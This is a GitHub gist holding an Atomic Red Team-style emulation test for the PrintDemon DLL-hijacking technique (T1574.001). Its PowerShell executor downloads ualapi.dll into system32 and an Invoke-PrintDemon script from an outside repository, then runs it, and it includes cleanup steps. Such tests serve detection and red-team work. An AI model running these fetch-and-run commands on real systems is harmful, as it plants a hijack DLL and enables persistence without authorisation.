Created
September 20, 2023 14:40
-
-
Save MHaggis/5b9cfef3e29c658273609578613ee396 to your computer and use it in GitHub Desktop.
#AtomicWednesdays T1574.001 - PrintDemon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - name: PrintDemon | |
| description: | | |
| Atomic Test to emulate PrintDemon. | |
| [Reference](https://github.com/BC-SECURITY/Invoke-PrintDemon) | |
| Also seen on TryHackme - https://tryhackme.com/room/dllhijacking | |
| supported_platforms: | |
| - windows | |
| input_arguments: | |
| dll_path: | |
| description: File path for ualapi.dll | |
| type: String | |
| default: C:\windows\system32 | |
| file_path: | |
| description: File path for invoke-printdemon | |
| type: String | |
| default: $env:Temp | |
| executor: | |
| name: powershell | |
| elevation_required: false | |
| command: | | |
| Invoke-WebRequest "https://github.com/BC-SECURITY/Invoke-PrintDemon/raw/master/ualapi.dll" -OutFile "#{dll_path}\ualapi.dll" | |
| Invoke-WebRequest "https://raw.githubusercontent.com/BC-SECURITY/Invoke-PrintDemon/master/Invoke-PrintDemon.ps1" -OutFile "#{file_path}\Invoke-PrintDemon.ps1" | |
| import-module #{file_path}\Invoke-PrintDemon.ps1; | |
| Invoke-PrintDemon | |
| cleanup_command: | | |
| Remove-Printer -name "PrintDemon" | |
| Remove-PrinterDriver "Generic / Text Only" | |
| Remove-PrinterPort "#{dll_path}\ualapi.dll" | |
| Remove-Item #{dll_path}\ualapi.dll -Force -ErrorAction Ignore | |
| Remove-Item #{file_path}\Invoke-PrintDemon.ps1 -Force -ErrorAction Ignore |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment